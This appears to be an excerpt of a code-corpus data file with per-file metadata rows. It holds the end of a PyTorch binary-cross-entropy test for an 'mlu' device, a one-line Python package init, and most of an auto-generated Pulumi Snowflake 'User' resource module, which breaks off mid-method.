out_cpu = F.binary_cross_entropy(x_cpu, target_cpu, reduction=reduct,
weight=weight_cpu)
if reduct == "none":
out_cpu.backward(grad_in)
else:
out_cpu.backward()
grad_cpu = copy.deepcopy(x_cpu.grad)
x_cpu.grad.zero_()
out_mlu = F.binary_cross_entropy(x_mlu, target_mlu,
reduction=reduct,
weight=weight_mlu)
if reduct == "none":
out_mlu.backward(grad_in_mlu)
else:
out_mlu.backward()
grad_mlu = copy.deepcopy(x_mlu.grad)
x_mlu.grad.zero_()
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
type_err[1], use_MSE=True)
self.assertTensorsEqual(grad_cpu.float(), grad_mlu.cpu().float(),
type_err[1], use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_bce_exceptions(self):
shape = (1024, 256)
reduct = "mean"
dtype = torch.half
x = torch.rand(shape, dtype=dtype, requires_grad=True)
target = torch.rand(shape, dtype=dtype)
weight = torch.rand(shape, dtype=dtype)
grad_in = torch.rand(shape, dtype=dtype)
grad_in_mlu = grad_in.to("mlu")
weight_mlu = weight.to("mlu")
grad_cpu = copy.deepcopy(x.grad)
ref_msg = r"binary_cross_entropy not implemented for 'Half'"
with self.assertRaisesRegex(RuntimeError, ref_msg):
out_mlu = F.binary_cross_entropy(x.to("mlu"), target.to("mlu"),
reduction=reduct,
weight=weight_mlu)
if reduct == "none":
out_mlu.backward(grad_in_mlu)
else:
out_mlu.backward()
if __name__ == "__main__":
unittest.main()
| 46.835714 | 114 | 0.539347 | 1,637 | 13,114 | 4.08369 | 0.101405 | 0.037696 | 0.052356 | 0.071055 | 0.873448 | 0.859387 | 0.845325 | 0.816604 | 0.783396 | 0.775916 | 0 | 0.021847 | 0.336816 | 13,114 | 279 | 115 | 47.003584 | 0.746809 | 0.046363 | 0 | 0.74502 | 0 | 0 | 0.020661 | 0 | 0 | 0 | 0 | 0.003584 | 0.051793 | 1 | 0.027888 | false | 0 | 0.047809 | 0 | 0.079681 | 0.015936 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7bae59506199f8a1fc438d85da12e0c9ff88372d | 31 | py | Python | cadmus/fig/__init__.py | sthenic/cadmus | caeb8b2c86f404e3bde05ced1337bc2c4ecddb19 | [
"MIT"
] | 2 | 2017-08-04T15:01:28.000Z | 2020-05-15T11:40:25.000Z | cadmus/fig/__init__.py | sthenic/cadmus | caeb8b2c86f404e3bde05ced1337bc2c4ecddb19 | [
"MIT"
] | 5 | 2016-09-03T15:25:00.000Z | 2020-08-31T19:00:44.000Z | cadmus/fig/__init__.py | sthenic/cadmus | caeb8b2c86f404e3bde05ced1337bc2c4ecddb19 | [
"MIT"
] | 1 | 2020-01-03T09:37:13.000Z | 2020-01-03T09:37:13.000Z | from .generate import generate
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c87d189f871f67d152df2d3e325c9237bb616390 | 41,619 | py | Python | sdk/python/pulumi_snowflake/user.py | Hacker0x01/pulumi-snowflake | f6ebcf2c3f73b103a7c2001fae231998ce1323b2 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2021-07-01T17:03:33.000Z | 2022-03-01T19:29:04.000Z | sdk/python/pulumi_snowflake/user.py | Hacker0x01/pulumi-snowflake | f6ebcf2c3f73b103a7c2001fae231998ce1323b2 | [
"ECL-2.0",
"Apache-2.0"
] | 102 | 2021-07-14T13:12:58.000Z | 2022-03-31T18:34:04.000Z | sdk/python/pulumi_snowflake/user.py | Hacker0x01/pulumi-snowflake | f6ebcf2c3f73b103a7c2001fae231998ce1323b2 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2022-03-25T07:24:45.000Z | 2022-03-25T07:24:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['UserArgs', 'User']
@pulumi.input_type
class UserArgs:
def __init__(__self__, *,
comment: Optional[pulumi.Input[str]] = None,
default_namespace: Optional[pulumi.Input[str]] = None,
default_role: Optional[pulumi.Input[str]] = None,
default_warehouse: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
email: Optional[pulumi.Input[str]] = None,
first_name: Optional[pulumi.Input[str]] = None,
last_name: Optional[pulumi.Input[str]] = None,
login_name: Optional[pulumi.Input[str]] = None,
must_change_password: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
rsa_public_key: Optional[pulumi.Input[str]] = None,
rsa_public_key2: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]] = None):
"""
The set of arguments for constructing a User resource.
:param pulumi.Input[str] default_namespace: Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
:param pulumi.Input[str] default_role: Specifies the role that is active by default for the user’s session upon login.
:param pulumi.Input[str] default_warehouse: Specifies the virtual warehouse that is active by default for the user’s session upon login.
:param pulumi.Input[str] display_name: Name displayed for the user in the Snowflake web interface.
:param pulumi.Input[str] email: Email address for the user.
:param pulumi.Input[str] first_name: First name of the user.
:param pulumi.Input[str] last_name: Last name of the user.
:param pulumi.Input[str] login_name: The name users use to log in. If not supplied, snowflake will use name instead.
:param pulumi.Input[bool] must_change_password: Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
:param pulumi.Input[str] name: Name of the user. Note that if you do not supply login*name this will be used as login*name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
:param pulumi.Input[str] password: **WARNING:** this will put the password in the terraform state file. Use carefully.
:param pulumi.Input[str] rsa_public_key: Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
:param pulumi.Input[str] rsa_public_key2: Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
:param pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]] tags: Definitions of a tag to associate with the resource.
"""
if comment is not None:
pulumi.set(__self__, "comment", comment)
if default_namespace is not None:
pulumi.set(__self__, "default_namespace", default_namespace)
if default_role is not None:
pulumi.set(__self__, "default_role", default_role)
if default_warehouse is not None:
pulumi.set(__self__, "default_warehouse", default_warehouse)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if email is not None:
pulumi.set(__self__, "email", email)
if first_name is not None:
pulumi.set(__self__, "first_name", first_name)
if last_name is not None:
pulumi.set(__self__, "last_name", last_name)
if login_name is not None:
pulumi.set(__self__, "login_name", login_name)
if must_change_password is not None:
pulumi.set(__self__, "must_change_password", must_change_password)
if name is not None:
pulumi.set(__self__, "name", name)
if password is not None:
pulumi.set(__self__, "password", password)
if rsa_public_key is not None:
pulumi.set(__self__, "rsa_public_key", rsa_public_key)
if rsa_public_key2 is not None:
pulumi.set(__self__, "rsa_public_key2", rsa_public_key2)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="defaultNamespace")
def default_namespace(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_namespace")
@default_namespace.setter
def default_namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_namespace", value)
@property
@pulumi.getter(name="defaultRole")
def default_role(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the role that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_role")
@default_role.setter
def default_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_role", value)
@property
@pulumi.getter(name="defaultWarehouse")
def default_warehouse(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the virtual warehouse that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_warehouse")
@default_warehouse.setter
def default_warehouse(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_warehouse", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
Name displayed for the user in the Snowflake web interface.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def email(self) -> Optional[pulumi.Input[str]]:
"""
Email address for the user.
"""
return pulumi.get(self, "email")
@email.setter
def email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "email", value)
@property
@pulumi.getter(name="firstName")
def first_name(self) -> Optional[pulumi.Input[str]]:
"""
First name of the user.
"""
return pulumi.get(self, "first_name")
@first_name.setter
def first_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "first_name", value)
@property
@pulumi.getter(name="lastName")
def last_name(self) -> Optional[pulumi.Input[str]]:
"""
Last name of the user.
"""
return pulumi.get(self, "last_name")
@last_name.setter
def last_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_name", value)
@property
@pulumi.getter(name="loginName")
def login_name(self) -> Optional[pulumi.Input[str]]:
"""
The name users use to log in. If not supplied, snowflake will use name instead.
"""
return pulumi.get(self, "login_name")
@login_name.setter
def login_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "login_name", value)
@property
@pulumi.getter(name="mustChangePassword")
def must_change_password(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
"""
return pulumi.get(self, "must_change_password")
@must_change_password.setter
def must_change_password(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "must_change_password", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the user. Note that if you do not supply login*name this will be used as login*name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
**WARNING:** this will put the password in the terraform state file. Use carefully.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="rsaPublicKey")
def rsa_public_key(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
"""
return pulumi.get(self, "rsa_public_key")
@rsa_public_key.setter
def rsa_public_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rsa_public_key", value)
@property
@pulumi.getter(name="rsaPublicKey2")
def rsa_public_key2(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
"""
return pulumi.get(self, "rsa_public_key2")
@rsa_public_key2.setter
def rsa_public_key2(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rsa_public_key2", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _UserState:
def __init__(__self__, *,
comment: Optional[pulumi.Input[str]] = None,
default_namespace: Optional[pulumi.Input[str]] = None,
default_role: Optional[pulumi.Input[str]] = None,
default_warehouse: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
email: Optional[pulumi.Input[str]] = None,
first_name: Optional[pulumi.Input[str]] = None,
has_rsa_public_key: Optional[pulumi.Input[bool]] = None,
last_name: Optional[pulumi.Input[str]] = None,
login_name: Optional[pulumi.Input[str]] = None,
must_change_password: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
rsa_public_key: Optional[pulumi.Input[str]] = None,
rsa_public_key2: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]] = None):
"""
Input properties used for looking up and filtering User resources.
:param pulumi.Input[str] default_namespace: Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
:param pulumi.Input[str] default_role: Specifies the role that is active by default for the user’s session upon login.
:param pulumi.Input[str] default_warehouse: Specifies the virtual warehouse that is active by default for the user’s session upon login.
:param pulumi.Input[str] display_name: Name displayed for the user in the Snowflake web interface.
:param pulumi.Input[str] email: Email address for the user.
:param pulumi.Input[str] first_name: First name of the user.
:param pulumi.Input[bool] has_rsa_public_key: Will be true if user as an RSA key set.
:param pulumi.Input[str] last_name: Last name of the user.
:param pulumi.Input[str] login_name: The name users use to log in. If not supplied, snowflake will use name instead.
:param pulumi.Input[bool] must_change_password: Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
:param pulumi.Input[str] name: Name of the user. Note that if you do not supply login*name this will be used as login*name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
:param pulumi.Input[str] password: **WARNING:** this will put the password in the terraform state file. Use carefully.
:param pulumi.Input[str] rsa_public_key: Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
:param pulumi.Input[str] rsa_public_key2: Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
:param pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]] tags: Definitions of a tag to associate with the resource.
"""
if comment is not None:
pulumi.set(__self__, "comment", comment)
if default_namespace is not None:
pulumi.set(__self__, "default_namespace", default_namespace)
if default_role is not None:
pulumi.set(__self__, "default_role", default_role)
if default_warehouse is not None:
pulumi.set(__self__, "default_warehouse", default_warehouse)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if email is not None:
pulumi.set(__self__, "email", email)
if first_name is not None:
pulumi.set(__self__, "first_name", first_name)
if has_rsa_public_key is not None:
pulumi.set(__self__, "has_rsa_public_key", has_rsa_public_key)
if last_name is not None:
pulumi.set(__self__, "last_name", last_name)
if login_name is not None:
pulumi.set(__self__, "login_name", login_name)
if must_change_password is not None:
pulumi.set(__self__, "must_change_password", must_change_password)
if name is not None:
pulumi.set(__self__, "name", name)
if password is not None:
pulumi.set(__self__, "password", password)
if rsa_public_key is not None:
pulumi.set(__self__, "rsa_public_key", rsa_public_key)
if rsa_public_key2 is not None:
pulumi.set(__self__, "rsa_public_key2", rsa_public_key2)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="defaultNamespace")
def default_namespace(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_namespace")
@default_namespace.setter
def default_namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_namespace", value)
@property
@pulumi.getter(name="defaultRole")
def default_role(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the role that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_role")
@default_role.setter
def default_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_role", value)
@property
@pulumi.getter(name="defaultWarehouse")
def default_warehouse(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the virtual warehouse that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_warehouse")
@default_warehouse.setter
def default_warehouse(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_warehouse", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
Name displayed for the user in the Snowflake web interface.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def email(self) -> Optional[pulumi.Input[str]]:
"""
Email address for the user.
"""
return pulumi.get(self, "email")
@email.setter
def email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "email", value)
@property
@pulumi.getter(name="firstName")
def first_name(self) -> Optional[pulumi.Input[str]]:
"""
First name of the user.
"""
return pulumi.get(self, "first_name")
@first_name.setter
def first_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "first_name", value)
@property
@pulumi.getter(name="hasRsaPublicKey")
def has_rsa_public_key(self) -> Optional[pulumi.Input[bool]]:
"""
Will be true if user as an RSA key set.
"""
return pulumi.get(self, "has_rsa_public_key")
@has_rsa_public_key.setter
def has_rsa_public_key(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "has_rsa_public_key", value)
@property
@pulumi.getter(name="lastName")
def last_name(self) -> Optional[pulumi.Input[str]]:
"""
Last name of the user.
"""
return pulumi.get(self, "last_name")
@last_name.setter
def last_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_name", value)
@property
@pulumi.getter(name="loginName")
def login_name(self) -> Optional[pulumi.Input[str]]:
"""
The name users use to log in. If not supplied, snowflake will use name instead.
"""
return pulumi.get(self, "login_name")
@login_name.setter
def login_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "login_name", value)
@property
@pulumi.getter(name="mustChangePassword")
def must_change_password(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
"""
return pulumi.get(self, "must_change_password")
@must_change_password.setter
def must_change_password(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "must_change_password", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the user. Note that if you do not supply login*name this will be used as login*name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
**WARNING:** this will put the password in the terraform state file. Use carefully.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="rsaPublicKey")
def rsa_public_key(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
"""
return pulumi.get(self, "rsa_public_key")
@rsa_public_key.setter
def rsa_public_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rsa_public_key", value)
@property
@pulumi.getter(name="rsaPublicKey2")
def rsa_public_key2(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
"""
return pulumi.get(self, "rsa_public_key2")
@rsa_public_key2.setter
def rsa_public_key2(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rsa_public_key2", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]]):
pulumi.set(self, "tags", value)
class User(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
default_namespace: Optional[pulumi.Input[str]] = None,
default_role: Optional[pulumi.Input[str]] = None,
default_warehouse: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
email: Optional[pulumi.Input[str]] = None,
first_name: Optional[pulumi.Input[str]] = None,
last_name: Optional[pulumi.Input[str]] = None,
login_name: Optional[pulumi.Input[str]] = None,
must_change_password: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
rsa_public_key: Optional[pulumi.Input[str]] = None,
rsa_public_key2: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]]] = None,
__props__=None):
"""
## Example Usage
```python
import pulumi
import pulumi_snowflake as snowflake
user = snowflake.User("user",
comment="A user of snowflake.",
default_role="role1",
default_warehouse="warehouse",
disabled=False,
display_name="Snowflake User",
email="user@snowflake.example",
first_name="Snowflake",
last_name="User",
login_name="snowflake_user",
must_change_password=False,
password="secret",
rsa_public_key="...",
rsa_public_key2="...")
```
## Import
```sh
$ pulumi import snowflake:index/user:User example userName
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] default_namespace: Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
:param pulumi.Input[str] default_role: Specifies the role that is active by default for the user’s session upon login.
:param pulumi.Input[str] default_warehouse: Specifies the virtual warehouse that is active by default for the user’s session upon login.
:param pulumi.Input[str] display_name: Name displayed for the user in the Snowflake web interface.
:param pulumi.Input[str] email: Email address for the user.
:param pulumi.Input[str] first_name: First name of the user.
:param pulumi.Input[str] last_name: Last name of the user.
:param pulumi.Input[str] login_name: The name users use to log in. If not supplied, snowflake will use name instead.
:param pulumi.Input[bool] must_change_password: Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
:param pulumi.Input[str] name: Name of the user. Note that if you do not supply login*name this will be used as login*name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
:param pulumi.Input[str] password: **WARNING:** this will put the password in the terraform state file. Use carefully.
:param pulumi.Input[str] rsa_public_key: Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
:param pulumi.Input[str] rsa_public_key2: Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]] tags: Definitions of a tag to associate with the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[UserArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Example Usage
```python
import pulumi
import pulumi_snowflake as snowflake
user = snowflake.User("user",
comment="A user of snowflake.",
default_role="role1",
default_warehouse="warehouse",
disabled=False,
display_name="Snowflake User",
email="user@snowflake.example",
first_name="Snowflake",
last_name="User",
login_name="snowflake_user",
must_change_password=False,
password="secret",
rsa_public_key="...",
rsa_public_key2="...")
```
## Import
```sh
$ pulumi import snowflake:index/user:User example userName
```
:param str resource_name: The name of the resource.
:param UserArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
default_namespace: Optional[pulumi.Input[str]] = None,
default_role: Optional[pulumi.Input[str]] = None,
default_warehouse: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
email: Optional[pulumi.Input[str]] = None,
first_name: Optional[pulumi.Input[str]] = None,
last_name: Optional[pulumi.Input[str]] = None,
login_name: Optional[pulumi.Input[str]] = None,
must_change_password: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
rsa_public_key: Optional[pulumi.Input[str]] = None,
rsa_public_key2: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = UserArgs.__new__(UserArgs)
__props__.__dict__["comment"] = comment
__props__.__dict__["default_namespace"] = default_namespace
__props__.__dict__["default_role"] = default_role
__props__.__dict__["default_warehouse"] = default_warehouse
__props__.__dict__["disabled"] = disabled
__props__.__dict__["display_name"] = display_name
__props__.__dict__["email"] = email
__props__.__dict__["first_name"] = first_name
__props__.__dict__["last_name"] = last_name
__props__.__dict__["login_name"] = login_name
__props__.__dict__["must_change_password"] = must_change_password
__props__.__dict__["name"] = name
__props__.__dict__["password"] = password
__props__.__dict__["rsa_public_key"] = rsa_public_key
__props__.__dict__["rsa_public_key2"] = rsa_public_key2
__props__.__dict__["tags"] = tags
__props__.__dict__["has_rsa_public_key"] = None
super(User, __self__).__init__(
'snowflake:index/user:User',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
default_namespace: Optional[pulumi.Input[str]] = None,
default_role: Optional[pulumi.Input[str]] = None,
default_warehouse: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
email: Optional[pulumi.Input[str]] = None,
first_name: Optional[pulumi.Input[str]] = None,
has_rsa_public_key: Optional[pulumi.Input[bool]] = None,
last_name: Optional[pulumi.Input[str]] = None,
login_name: Optional[pulumi.Input[str]] = None,
must_change_password: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
rsa_public_key: Optional[pulumi.Input[str]] = None,
rsa_public_key2: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]]] = None) -> 'User':
"""
Get an existing User resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] default_namespace: Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
:param pulumi.Input[str] default_role: Specifies the role that is active by default for the user’s session upon login.
:param pulumi.Input[str] default_warehouse: Specifies the virtual warehouse that is active by default for the user’s session upon login.
:param pulumi.Input[str] display_name: Name displayed for the user in the Snowflake web interface.
:param pulumi.Input[str] email: Email address for the user.
:param pulumi.Input[str] first_name: First name of the user.
:param pulumi.Input[bool] has_rsa_public_key: Will be true if user as an RSA key set.
:param pulumi.Input[str] last_name: Last name of the user.
:param pulumi.Input[str] login_name: The name users use to log in. If not supplied, snowflake will use name instead.
:param pulumi.Input[bool] must_change_password: Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
:param pulumi.Input[str] name: Name of the user. Note that if you do not supply login*name this will be used as login*name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
:param pulumi.Input[str] password: **WARNING:** this will put the password in the terraform state file. Use carefully.
:param pulumi.Input[str] rsa_public_key: Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
:param pulumi.Input[str] rsa_public_key2: Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]] tags: Definitions of a tag to associate with the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _UserState.__new__(_UserState)
